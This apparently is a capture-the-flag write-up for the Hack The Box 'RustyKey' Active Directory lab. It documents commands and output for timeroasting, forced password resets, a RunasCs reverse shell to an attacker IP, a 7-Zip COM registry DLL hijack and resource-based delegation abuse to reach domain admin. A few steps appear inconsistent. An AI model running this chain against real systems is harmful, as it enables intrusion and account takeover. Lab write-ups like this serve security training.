Hack-The-Box - Hard - Windows - RustyKey

RustKey is yet another assumed breach scenario wherein NTLM authentication is disabled but an older version of Kerberos is being utilized. Gathering Bloodhound data, I identified several targets, the first one being IT-Computer3$ which I could access through timeroasting. IT-Computer3$ was a member of the helpdesk group which can add and remove members from the protected objects group and change passwords for several accounts. I could remove the IT and support groups and gain access to 2 additional accounts: BB.MORGAN and EE.REED. I found a memo detailing additional access provided to members of the support team, including EE.REED, on archiving utilities. I utilized this as a hint to look at registry DLL paths for 7-zip which we can modify to point to an arbitrary DLL. When I pointed this to a malicious DLL, I gained access as MM.TURNER who we can use to conduct an RBCD attack.

Machine Name	Platform	IP-Address	Difficulty	Machine Domain	Second Domain
RustyKey	Windows	10.10.11.75	Hard	rustykey.htb	dc.rustykey.htb

Enumeration

I performed an initial Nmap scan and got the following results:

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo nmap -sC -sV 10.10.11.75
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 21:02 CEST
Nmap scan report for 10.10.11.75
Host is up (0.029s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-29 03:02:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  LDAP          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  LDAP          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-06-29T03:02:38
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 7h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.01 seconds

I then added the IP-Address to the /etc/hosts file on the attacker system.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ echo "10.10.11.75 DC rustykey.htb" | sudo tee -a /etc/hosts
10.10.11.75 DC rustykey.htb

This machine was an assumed breach scenario as it usually is with the Windows Machines.

Hack-The-Box RustyKey Machine - Assumed Breach Initial User Information

When attempting to authenticate to LDAP, I received a STATUS NOT SUPPORTED error.
Which indicates that the default authentication method of NTLM, is disabled.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec smb rustykey.htb -u rr.parker -p '8#t5HE8L!W3A'
SMB         10.10.11.75   445    10.10.11.75    [*]  x64 (name:10.10.11.75) (domain:RUSTYKEY.HTB) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.75   445    10.10.11.75    [-]  rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED

I then decided to set up and use the Kerberos authentication method.
Firstly, I generated a krb5.conf file using the guide written by 0xBEN .
Afterwards, I exported the file to be the main configuration file and initiate an authentication.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5_CONFIG=/home/kali/HTB/RustKey/custom_krb5.conf
kinit rr.parker
Password for rr.parker@RUSTYKEY.HTB:
Warning: encryption type arcfour-hmac used for authentication is deprecated and will be disabled

I then performed a double check on the Kerberos authentication by running klist.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: rr.parker@RUSTYKEY.HTB

Valid starting       Expires              Service principal
06/29/2025 09:18:42  06/29/2025 19:18:42  krbtgt/RUSTYKEY.HTB@RUSTYKEY.HTB
        renew until 06/30/2025 09:18:38

I then exported the KRB5CCNAME variable to have the value of the TGT ticket.
That we got through this process which we can find in the /tmp directory.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5CCNAME=/tmp/krb5cc_1000

This step is actually unnecessary as kinit should set the environment variable by default.
But I, messing around with a bunch of TGTs. had to export this environment variable.
Then, I authenticated to LDAP using Kerberos and the exported kcache, and it was successful.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec LDAP rustykey.htb -k --use-kcache
LDAP        rustykey.htb    389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        rustykey.htb    389    DC               [+] rustykey.htb\rr.parker from ccache

I then used the netexec to grab some data for the bloodhound tool's Enumeration.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec LDAP rustykey.htb -k --use-kcache --dns-server 10.10.11.75 --bloodhound -c all
LDAP        rustykey.htb    389    DC               [*] None (name:DC) (domain:rustykey.htb)
.... < SNIPPING LONG OUTOUT STREAM > ....
LDAP        rustykey.htb    389    DC               Compressing output into /home/kali/.nxc/logs/DC_rustykey.htb_2025-06-29_145025_bloodhound.zip

Looking at the bloodhound data, I couldn't find any direct ACLs that were exploitable.
It looked like the main goal was to get access as NN.MARCOS user, who was a member of the Helpdesk group.
The Helpdesk Group had permissions to Force Change Password several users.
Some of the users in question were members of the Remote Management Users and the Protected Objects group.

Hack-The-Box RustyKey Machine - Permissions of the Help Group

I then started performing enumeration on the Helpdesk group question.
It was found that it-computer3 acount had addSelf permission over the Helpdesk group.

Hack-The-Box RustyKey Machine - Permissions of IT-Computer3 Account

Initial Access

Since it's not a pre-2000-compatible-windows group member, the only other option available to check on this computer account is to do some form of roasting.
One particular method stands out for computer accounts which is timeroasting. I decided to use timeroast.py to conduct this attack.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo ./timeroast.py 10.10.11.75 | tee ntp-hashes.txt
[sudo] password for kali:
1000:$sntp-ms$673deff65ba0b936f611053f3bead102$1c0111e900000000000a1b344c4f434cec0b2af884ffce81e1b8428bffbfcd0aec0b4ed624ffbc0dec0b4ed624ffd892
1104:$sntp-ms$da9a7a30f696e17bb4b4731865fb1b43$1c0111e900000000000a1b344c4f434cec0b2af8829b7d9fe1b8428bffbfcd0aec0b4ed6d2bc3321ec0b4ed6d2bc4a9e
1103:$sntp-ms$c54e367acabfdf8ae049616c06516c60$1c0111e900000000000a1b344c4f434cec0b2af8829b0178e1b8428bffbfcd0aec0b4ed6d2bbb044ec0b4ed6d2bbd1d2
1105:$sntp-ms$13b40597252d73a45e01cb98399496b0$1c0111e900000000000a1b344c4f434cec0b2af8829bba05e1b8428bffbfcd0aec0b4ed6d6935836ec0b4ed6d693a3b6
1106:$sntp-ms$0eeaa19ae46e8b15a32cd631b73bcce6$1c0111e900000000000a1b344c4f434cec0b2af8843916a2e1b8428bffbfcd0aec0b4ed6d830b82eec0b4ed6d830f99d
1107:$sntp-ms$5039dbb0876228e38dc2f241064e3fe3$1c0111e900000000000a1b344c4f434cec0b2af885bed817e1b8428bffbfcd0aec0b4ed6d9b677f6ec0b4ed6d9b6c01b
1121:$sntp-ms$e4e780762ee1e408b365049937c9e035$1c0111e900000000000a1b354c4f434cec0b2af884acc921e1b8428bffbfcd0aec0b4ed6ec9c4545ec0b4ed6ec9c779a
1120:$sntp-ms$7a0907455dad90ca9538a7f175d94dca$1c0111e900000000000a1b354c4f434cec0b2af884a9ebf7e1b8428bffbfcd0aec0b4ed6ec9973d9ec0b4ed6ec999715
1118:$sntp-ms$a27dee3aad3c978ed6c52a603026e7fd$1c0111e900000000000a1b354c4f434cec0b2af8848f6639e1b8428bffbfcd0aec0b4ed6ec7ef680ec0b4ed6ec7f0c4f
1119:$sntp-ms$855ad8d96730a4e5fa6b3492378e52b4$1c0111e900000000000a1b354c4f434cec0b2af884924a19e1b8428bffbfcd0aec0b4ed6ec81c999ec0b4ed6ec81f538
1122:$sntp-ms$ff95d282096729712b1275fbb39a814d$1c0111e900000000000a1b354c4f434cec0b2af883f81f60e1b8428bffbfcd0aec0b4ed6f0001e32ec0b4ed6f0006804
1123:$sntp-ms$fd93afeae388bba24361afbd791d6dcd$1c0111e900000000000a1b354c4f434cec0b2af883f92a22e1b8428bffbfcd0aec0b4ed6f0013d16ec0b4ed6f0016dbe
1125:$sntp-ms$c1a103e9a3cc75e7a525ee1f07663272$1c0111e900000000000a1b354c4f434cec0b2af883099905e1b8428bffbfcd0aec0b4ed6f32a411cec0b4ed6f32a6e68
1124:$sntp-ms$f470bb24f1a392e4a54b937dc3e71b07$1c0111e900000000000a1b354c4f434cec0b2af88308a5c0e1b8428bffbfcd0aec0b4ed6f3294573ec0b4ed6f3297cd1
1127:$sntp-ms$888e560b0110dcdd8f8c7875d2ac570a$1c0111e900000000000a1b354c4f434cec0b2af8827235a7e1b8428bffbfcd0aec0b4ed6f669e9a8ec0b4ed6f66a16f5
1126:$sntp-ms$a561e867a6d41b1f24759f7e3488f568$1c0111e900000000000a1b354c4f434cec0b2af88271913ce1b8428bffbfcd0aec0b4ed6f6692c13ec0b4ed6f6697c9b
.... < SNIPPING LONG OUTOUT STREAM > ....

I was able to pin point the relevant hash because of the rid-brute attack conducted earlier.
The most relevant hash was 1125 as it was the RID of IT-COMPUTER3.
I then used the bundled tool timecrack found in the same repository, to crack the hashes.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo ./timecrack.py ../ntp_hashes.txt rockyou_clean.txt
[+] Cracked RID 1125 password: [REDACTED]

I was able to recover the credentials for it-computer3$ account.
The next step was to add our controlled computer account to the Helpdesk group.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k add groupMember Helpdesk it-computer3$
[+] it-computer3$ added to Helpdesk

After successfully adding the it-computer3$ user to the Helpdesk group.
I used the getTGT script from impacket to get its TGT Ticket.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ impacket-getTGT  'RUSTYKEY.HTB/it-computer3$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Saving ticket in it-computer3$.ccache

Lateral Movement #1

After enumeration of the Protected Objects, I saw that most of the users were in that group.
Which meant that even after resetting their passwords, authentication would not be successful.
This is because to authenticate as a user that is a member of Protected Objects, their TGT Ticket is required.
However in this case, I was able to AddMembers to the Protected Objects.
This exploit isn't too useful on its own, but this permissions also allows you to remove members.
I decided to remove the IT group from the Protected Objects using the BloodyAD tool.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k remove groupMember "Protected Objects" IT
[-] IT removed from Protected Objects

Removing the IT group from Protected Groups allowed me to reset the password for bb.morgan user.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k set password bb.morgan Wild1234!
[+] Password changed successfully!

After which, I was able to authenticate as bb.morgan user through kinit utility.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ echo '8#t5HE8L!W3A' | kinit rr.parker
Password for bb.morgan@RUSTYKEY.HTB:
Warning: encryption type arcfour-hmac used for authentication is deprecated and will be disabled

Since bb.morgan user was a member of Remote Management Users Group, it allowed me to get a WinRM shell.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ Evil-WinRM -i dc.rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/Evil-WinRM#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> dir ../Desktop

    Directory: C:\Users\bb.morgan\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/4/2025   9:15 AM           1976 internal.pdf
-ar---        7/10/2025   7:02 PM             34 user.txt

I was able to gain access as the bb.morgan user and also found a PDF on Desktop.

Lateral Movement #2

Transferring over the pdf file to attacker system, I was able to read the following email.

Internal Memo

From: bb.morgan@rustykey.htb
To: support-team@rustykey.htb
Subject: Support Group - Archiving Tool Access
Date: Mon, 10 Mar 2025 14:35:18 +0100

Hey team,
	As part of the new Support utilities rollout, extended access has been temporarily granted to allow testing and
troubleshooting of file archiving features across shared workstations. This is mainly to help streamline ticket
resolution related to extraction/compression issues reported by the Finance and IT teams. Some newer systems handle
context menu actions differently, so registry-level adjustments are expected during this phase.

A few notes:
- Please avoid making unrelated changes to system components while this access is active.
- This permission change is logged and will be rolled back once the archiving utility is confirmed stable in all
environments.
- Let DevOps know if you encounter access errors or missing shell actions.

Thanks,
BB Morgan
IT Department

It Looked like a memo to inform that support team members, including ee.reed, had access to archiving tools.
The memo also mentioned that there could be registry level adjustments during this phase as well.
Which indicated that support might have access to modify the registry related to the archiving tools.
Therefore, the current target is ee.reed, I first removed Support group from Protected Objects.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k remove groupMember "Protected Objects" SUPPORT
[-] SUPPORT removed from Protected Objects

I was then able to change password for ee.reed user, since his group is no longer part of the Protected Objects.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k set password ee.reed 'Wild1234!'
[+] Password changed successfully!

However, I was still unable to authenticate using WinRM, LDAP, or SMB based authentication methods.
So instead, I used the RunasCs tool. Created by @antonioCoco

*Evil-WinRM* PS C:\Windows\Temp> ./RunasCs.exe ee.reed Wild1234! cmd.exe -r 10.10.16.75:3232
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-46cab11$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 3264 created in background.

I was successfully able to receive the reverse shell on the netcat listener.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ rlwrap nc -lvnp 3232
listening on [any] 3232 ...
connect to [10.10.16.75] from (UNKNOWN) [10.10.11.75] 61519
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

PS C:\Users> whoami
rustykey\ee.reed

Privilege Escalation

Having found that the members of support group (such as ee.reed) have privileges on the Registry.
I decided to enumerate and perform privilege escalation via the Registry Hives.
I then used following script to check for writeable DLL paths in the Registry.

PS C:\Windows\system32> Get-ChildItem HKLM:\SOFTWARE -Recurse -ErrorAction SilentlyContinue | Where-Object {
>>     try {
>>         $keyPath = $_.Name.Replace('HKEY_LOCAL_MACHINE\', '')
>>         $regKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($keyPath, $true)
>>         $regKey.SetValue('TestWrite','1')
>>         $regKey.DeleteValue('TestWrite')
>>         $true
>>     } catch {
>>         $false
>>     }
>> }

    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID

Name                                          Property
----                                          --------
{23170F69-40C1-278A-1000-000100020000}        (default) : 7-Zip Shell Extension

    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}

Name                           Property
----                           --------
InprocServer32                 (default)      : C:\Program Files\7-Zip\7-zip.dll
							   ThreadingModel : Apartment

I was then able to alter the (default) value InprocServer32 key in the below hive.

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}

I then used this misconfiguration/vulnerability to change this into a malicious .dll.

PS C:\Windows\Tasks> Set-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(default)" -Value "C:\Windows\Tasks\w.dll"
PS C:\Windows\Tasks> Get-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32"

(default)      : C:\Windows\Tasks\w.dll
ThreadingModel : Apartment
PSPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
PSParentPath   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
PSChildName    : InprocServer32
PSDrive        : HKLM
PSProvider     : Microsoft.PowerShell.Core\Registry

After making the required changes, I had to wait for about a minute to receive a reverse shell Connection.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.75] from (UNKNOWN) [10.10.11.75] 61519
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>whoami
whoami
rustykey\mm.turner

I then discovered through bloodhound that the mm.turner user was a member of Delegationmanagers Group.
Which meant this user could act on the behalf of the Domain Controller (DC).
Firstly, I granted the DC$ account, the permission to delegate authentication to IT-Computer3$ account.

PS C:\Windows> Set-ADComputer DC$ -PrincipalsAllowedToDelegateToAccount 'it-computer3$'
PS C:\Windows> Get-ADComputer DC$ -Properties PrincipalsAllowedToDelegateToAccount

DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb
DNSHostName                          : dc.rustykey.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : dee94947-219e-4b13-9d41-543a4085431c
PrincipalsAllowedToDelegateToAccount : {CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-3316070415-896458127-4139322052-1000
UserPrincipalName                    :

The next step of RBCD is to obtain a Service Ticket and I did just that.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ impacket-getST -spn "CIFS/dc.rustykey.htb" -impersonate backupadmin -dc-ip 10.10.11.75 "rustykey.htb/rr.parker:'8#t5HE8L!W3A'"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
/home/kali/.local/bin/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/home/kali/.local/bin/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/home/kali/.local/bin/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/home/kali/.local/bin/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@CIFS_DC.rustykey.htb@RUSTYKEY.HTB.ccache

After getting the ccache file, I then performed a check for authentication.

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5CCNAME=$(pwd)/backupadmin@CIFS_DC.rustykey.htb@RUSTYKEY.HTB.ccache

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec smb dc.rustykey.htb -k -u backupadmin --use-kcache -X "dir C:\Users\Administrator\Desktop"
SMB         DC.rustykey.htb 445    DC               [*]  x64 (name:DC) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.rustykey.htb 445    DC               [+] rustykey.htb\backupadmin from ccache (Pwn3d!)
SMB         DC.rustykey.htb 445    DC               [+] Executed command via wmiexec
SMB         DC.rustykey.htb 445    DC                   Directory: C:\Users\Administrator\Desktop
SMB         DC.rustykey.htb 445    DC               Mode                LastWriteTime         Length Name
SMB         DC.rustykey.htb 445    DC               ----                -------------         ------ ----
SMB         DC.rustykey.htb 445    DC               -ar---        7/10/2025   7:02 PM             34 root.txt
.... < SNIPPING LONG OUTOUT STREAM > ....

As it can be seen in the above output that I was able to execute commands as the DC$.
Which meant that the Season 8 - Rustykey Machine on Hack-The-Box was now complete.

Hack-The-Box RustyKey Machine - Machine Completed